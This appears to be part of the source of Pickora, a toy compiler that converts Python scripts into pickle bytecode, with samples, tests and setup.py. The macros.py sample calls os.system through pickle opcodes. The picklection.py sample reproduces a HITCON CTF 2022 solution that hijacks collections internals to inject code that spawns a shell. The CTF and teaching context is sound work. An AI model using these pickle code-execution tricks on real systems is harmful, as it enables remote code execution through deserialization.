24 | print("slice(0, -7, 2) =", printable[0:-7:2]) 25 | print("os.popen('date') =", run_cmd('date').read()) 26 | 27 | 28 | # assignment tests 29 | l = [1, 2, 3, 4] 30 | x = l[1] = y = z = 10 31 | l[2] = a = b = c = 100 32 | i = j = k = l[0] = 1000 33 | print(l) 34 | print(x, y, z) 35 | print(a, b, c) 36 | print(i, j, k) 37 | 38 | l[0:3] = [9, 8, 7] 39 | print(l) 40 | 41 | d = {"x": 1, "y": 2, "z": 3} 42 | k = 'y' 43 | d[k] = 999 44 | d['owo'] = 'new' 45 | print(d) 46 | 47 | string.my_str = 'meow 🐱' 48 | print(string.my_str) 49 | 50 | # lambda tests 51 | print(list(map(lambda x, y: x+y, range(0, 10), range(100, 110)))) 52 | f = lambda a, b=pow(2, 2): a+b 53 | print(f, f(5), f(5, 5)) 54 | -------------------------------------------------------------------------------- /samples/hello.py: -------------------------------------------------------------------------------- 1 | from builtins import print 2 | 3 | print("===================") 4 | print("| Hello, world! 🐱 |") 5 | print("===================") 6 | -------------------------------------------------------------------------------- /samples/macros.py: -------------------------------------------------------------------------------- 1 | mod = 'builtins' 2 | p = STACK_GLOBAL(mod, 'print') 3 | d = {"a": 1, "b": 2} 4 | BUILD(help, d, {"c": 3, "d": 4}) 5 | p(help.a, help.b, help.c, help.d) 6 | 7 | GLOBAL('os', 'system')('date') 8 | INST('os', 'system', ('cal',)) 9 | OBJ(p, (1, 2, 3)) 10 | 11 | # INST(mod, name, ('hello', 'world')) # should fail 12 | # INST(mod, name) # should fail 13 | # INST('builtins', 123, ('hello', )) # should fail 14 | -------------------------------------------------------------------------------- /samples/picklection.py: -------------------------------------------------------------------------------- 1 | # HITCON CTF 2022: Picklection 2 | # https://github.com/splitline/My-CTF-Challenges/blob/master/hitcon-ctf/2022/misc/Picklection/release/share/chal.py 3 | 4 | from collections import namedtuple, _collections_abc, _sys, namedtuple, Counter, UserString 5 | _collections_abc.__all__ = ["_check_methods", "_type_repr", 'abstractmethod', 6 | 'map', 'tuple', 'str'] 7 | from collections import _check_methods, _type_repr, abstractmethod 8 | 9 | s_dummy = UserString('x') 10 | s_dummy.__mro__ = () 11 | 12 | field_names = Counter() 13 | 14 | # field_names.replace(',', ' ').split() 15 | UserString.replace = _check_methods 16 | field_names.split = _check_methods 17 | _check_methods.__defaults__ = (abstractmethod,) 18 | abstractmethod.__mro__ = () 19 | 20 | # abstractmethod: basically do nothing 21 | _sys.intern = abstractmethod 22 | 23 | _collections_abc.NotImplemented = field_names 24 | _collections_abc.map = _check_methods 25 | _collections_abc.tuple = _type_repr 26 | 27 | # if isinstance(obj, type): ... 28 | _collections_abc.type = Counter 29 | 30 | field_names.__module__ = 'builtins' 31 | field_names.__qualname__ = [ 32 | 'a=[].__reduce_ex__(3)[0].__globals__["__builtins__"]["__import__"]("os").system("sh"):0#' 33 | ] 34 | 35 | # '__name__': f'namedtuple_{typename}' 36 | UserString.__str__ = _type_repr 37 | 38 | _collections_abc.str = UserString 39 | from collections import map, tuple, str 40 | 41 | namedtuple(s_dummy, s_dummy) 42 | -------------------------------------------------------------------------------- /samples/reddit_browser.py: -------------------------------------------------------------------------------- 1 | from urllib.request import urlopen 2 | 3 | from json import load as json_load 4 | from operator import itemgetter 5 | from functools import partial 6 | from itertools import starmap 7 | 8 | print("+---------------------+") 9 | print("| Subreddit Browser |") 10 | print("+---------------------+") 11 | 12 | options = { 13 | 0: "/r/all", 14 | 1: "/r/Python", 15 | 2: "/r/memes", 16 | } 17 | 18 | print('id Subreddit') 19 | tuple(map(print, starmap( 20 | partial(str.format, "{}: {}" ), 21 | options.items()))) 22 | choice = input("[+] Choose a subreddit: ") 23 | subreddit = options.get(int(choice), "/r/Python") 24 | 25 | print("Loading...") 26 | 27 | json = json_load(urlopen('https://www.reddit.com%s.json' % subreddit)) 28 | 29 | 30 | articles = json['data']['children'] 31 | get_data = itemgetter('data') 32 | get_detail = itemgetter('ups', 'title', 'num_comments', 'permalink') 33 | detailed_articles = map(get_detail, map(get_data, articles)) 34 | 35 | listitem_render = partial(str.format, 36 | "-" * 32 + "\n" + 37 | "^{0} [{1}] | 💬 {2}\n🔗 https://www.reddit.com{3}\n" + 38 | "-" * 32 + "\n") 39 | 40 | tuple(map(print, starmap(listitem_render, detailed_articles))) 41 | 42 | RETURN = "Subreddit browser demo :D" 43 | -------------------------------------------------------------------------------- /samples/test_calculation.py: -------------------------------------------------------------------------------- 1 | print(9*8.6%13**(12)//7.6-3//14.7+(12%0.9//2.3//13//6.1)) 2 | print((0.3+4.9%5)//1.4**10**3-(9.3//15**3.1)%10%12.8*(0.6)) 3 | print(4/7.2**9.8-2.8//(6.5%3)) 4 | print((8.9//11.9//1//5)**2.5%6+9.1*5.5%9.4*(8-8.5)%14**2+1.3) 5 | print(7/(8.9%11.3/5.7**3.2)+3%13.8-3.8**14*(4-9)**7) 6 | print(7.8//15*(5//14%11-11.3//8)) 7 | print(6.3%3.3+1.2+11**13/10.0+2**4.0*12.9+3%3.4%(11.3%9.6)) 8 | print(10%(7%7.9)) 9 | print(2.5+(3%13.1//12)**(14.0)//(12**13-0.8)) 10 | print(2+7**7.0//(8%8.7%2//11+6.4)%4.9*(9.2)) 11 | print(1**9.7//13.3/6.0//13**7.3+8+8) 12 | print((12.4*4+2.3//1**2.8*1.1/1.5//8//11)/(6.9%11)//(7)-14.7/2.4) 13 | print(6/(7)*9.1/3+7/13/14%(11.8)+(11*12)//(5.9*6)) 14 | print(10.5/(14.5%3.1*3.2)) 15 | print(5.2*8.7-14.6*15-15-(7)) 16 | print((7-4.5//7.2)//(10.2)**(5)%12.6//(11.0//0.4**9)) 17 | print((5%3)/14.5**2) 18 | print(2.9%(8)-0.0*(3%0.3*7.0**13.5/6.7**3.8*13%9.9%0.2/9.1)) 19 | print(10.2//8.7-3//9%8.1//2) 20 | print((7)*4.1) 21 | 22 | # ans=[10.0, 0.0, -4.999999984143712, 195.775, 10227285578230.215, -0.0, 3452271214605.0, 3.0, 2.5, 38.799999999914164, 16.0, -5.125, 5.638461538461538, 1.5625000000000002, -195.76, 0.0, 0.009512485136741973, 2.9, 1.0, 28.699999999999996] -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | import setuptools 2 | 3 | setuptools.setup( 4 | name="pickora", 5 | version="1.0.1", 6 | author="splitline", 7 | author_email="tbsthitw@gmail.com", 8 | description="A toy compiler that can convert Python scripts into pickle bytecode.", 9 | long_description=open("README.md", "r").read(), 10 | long_description_content_type="text/markdown", 11 | url="https://github.com/splitline/Pickora", 12 | packages=setuptools.find_packages(), 13 | classifiers=[ 14 | "Programming Language :: Python :: 3", 15 | "License :: OSI Approved :: MIT License", 16 | "Operating System :: OS Independent", 17 | ], 18 | python_requires='>=3.8', 19 | 20 | entry_points={ 21 | "console_scripts": [ 22 | "pickora = pickora:main", 23 | ], 24 | }, 25 | ) 26 | 27 | --------------------------------------------------------------------------------